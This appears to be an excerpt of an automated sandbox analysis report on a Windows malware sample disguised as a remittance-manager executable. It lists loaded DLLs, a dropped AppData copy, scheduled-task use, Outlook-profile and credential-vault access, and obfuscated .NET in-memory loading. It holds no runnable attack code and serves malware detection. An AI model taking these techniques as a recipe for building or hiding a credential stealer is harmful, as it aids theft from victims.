                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: yuZb.pdbSHA256 source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
                    Source: Binary string: yuZb.pdb source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: GestorRemesasCONFIRMIMING.exe, AnaForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: XNYbGrcoFr.exe.0.dr, AnaForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs.Net Code: AfkO4iFLQN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs.Net Code: AfkO4iFLQN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.25bef8c.1.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.4ea0000.6.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: 0xD3B46635 [Mon Jul 20 23:20:21 2082 UTC]
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A40007 push es; retf 0_2_06A4001C
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0294F228 push eax; retn 068Ah9_2_0294F2D1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02940C53 push ebx; retf 9_2_02940C52
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02940C45 push ebx; retf 9_2_02940C52
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02940C6D push edi; retf 9_2_02940C7A
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_068F6030 push es; ret 9_2_068F6040
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122F238 push eax; retn 058Ch14_2_0122F2D1
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_01220C45 push ebx; retf 14_2_01220C52
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122EE0C pushad ; ret 14_2_0122EE0D
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: section name: .text entropy: 7.958322330066031
                    Source: XNYbGrcoFr.exe.0.drStatic PE information: section name: .text entropy: 7.958322330066031
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, Ve41iQ9PJaAIEEUZNC.csHigh entropy of concatenated method names: 'dJ2UgJPlKU', 'fdRUXip73P', 'AS3UdtUsfh', 'Bbxd7HHZqP', 'wqOdzum1jI', 'ouYUaLLy14', 'ngoU5MJyqO', 'xqyUproAuM', 'VGvUVOOlxT', 'FpeUOJVh0W'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, GIgbxK5VWMd1fni7NmR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsIqP0MWJw', 'XOnqkDmd5Z', 'saIqI02eYx', 'vXcqrjWa4D', 'c9iq04oAOh', 'DEgqWJ6DEs', 'vIjq8IcBKv'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, O8Kju4WdatacJtMlao.csHigh entropy of concatenated method names: 'lwwRABcoHe', 'ksWR7oI3tf', 'WqKBaXwIyE', 'aeGB5u5ORu', 'EFhRt7b6UL', 'EEtRJyE33F', 'zmcRKWV2uk', 'Oe5RPAXlIP', 'xNSRksmxdJ', 'LmCRI7xEY0'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, NQnrfhcriRyJ7DvK1o.csHigh entropy of concatenated method names: 'Dispose', 'ABo5hGXJcQ', 'btNpMSoGUo', 'xFsbb1GNsk', 'A7h57XSrqJ', 'r285zjLnWk', 'ProcessDialogKey', 'FHUpa1ID0V', 'BNGp5TOnmn', 'lcappfZlr3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, zH39l8IGsmijULtLhe.csHigh entropy of concatenated method names: 'ToString', 'LS6jtCiGwp', 'RZ8jMxtfR2', 'chpjSybyur', 'P3sjyvlq17', 'kgUjivKiS8', 'VVLjZVk2Tu', 'a1Qj9PJDFe', 'd7Gjm3sSeY', 'tICjlYT7EL'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, mZlr3Q70sPyqcdFmuV.csHigh entropy of concatenated method names: 'NPp25fyoWd', 'lLT2Vyw4gc', 'FNj2Os6JR6', 'SGV2gqKS5N', 'h6H2c7ZlyU', 'fMw2eOvUbI', 'cug2dwu1y9', 'VwjB85D9YX', 'iQIBAOLvsy', 'XPiBhVsTOU'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, XS1NE3retZlaifF1ni.csHigh entropy of concatenated method names: 'srVR1oIvRa', 'piFRfqYb5H', 'ToString', 'iHGRgQWjSf', 'zgJRcLxZWC', 'uMuRXqKhK2', 'yGKRee0jJo', 'kx8RdQXLf7', 'B4bRUCs1bl', 'E0RRxBmvp8'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, A9QjLMYwTjItUACC7F.csHigh entropy of concatenated method names: 'wJGdNdYCLD', 'CmddcBiY0P', 'olIdeQNH1W', 'MwAdUnLHCq', 'UhTdx85iAj', 'VZye0MI0at', 'z6KeW3rscM', 'ykve8HRDao', 'jGYeArk7rY', 'vclehYVpJ3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, Kk2NMrOZGpdTfsfT7e.csHigh entropy of concatenated method names: 'OCF5U31OK3', 'IYL5xts9Kn', 'tQJ51pdQAt', 'kq95fG72Li', 'wMR56qlQ9Q', 'pLM5jwTjIt', 'wTEuUOva98X8VabJYj', 'XBta0PwnS1Uiw1lVtZ', 'temnn3NK2SyOuM6Q0d', 'MW655HbMvr'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, MqqPW7K7lpQUUAPgEw.csHigh entropy of concatenated method names: 'sq0TDmrOIQ', 'zhHTGatRAo', 'U39TYB7Q1k', 'q3bTMmR43t', 'EFJTynAip7', 'A6bTiPI4Rx', 'N04T9wScOh', 'ICkTm7Lv0Q', 'L0cTve9P03', 'RlvTtROPOT'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, b2uxQNlJT12B9qrnb4.csHigh entropy of concatenated method names: 'vAuUoqUrdo', 'pA8UwV80SC', 'HgOU4UcNKc', 'OZSUQGJvCR', 'OwFUu46GJI', 'rXKUFo92CE', 'cxTUHfo5yw', 'fCWUDQIeeF', 'fj1UGDL9QP', 'w5GUCERgW3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, j1ID0VhuNGTOnmnnca.csHigh entropy of concatenated method names: 'ihYBY4OFVX', 'dbGBMUEnuj', 'lAIBS66N4F', 'HSIByOGwwu', 'gghBPIJdfH', 'ymIBi8vytC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, YerQAbGQJpdQAtxq9G.csHigh entropy of concatenated method names: 'IXJXQfQbTK', 'MPdXFNL8fx', 'zbHXDslvSP', 'CSuXGlVIlt', 'Y4ZX6BASHc', 'WsJXjLN1FG', 'RADXRqTif0', 'uD1XBUwbpm', 'LBnX2gCayx', 'ioWXqqpTfA'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, C31OK3DSYLts9Kn2AE.csHigh entropy of concatenated method names: 'vgocPKMEbO', 'ILfckZkvI5', 'hIAcItdYDW', 'CElcrt1ROd', 'Jjbc0AIUCP', 'vwLcWfBaS5', 'Ejgc8jbG4M', 'IBZcA2NClH', 'kBJchDXluq', 'l6qc7GsCR5'
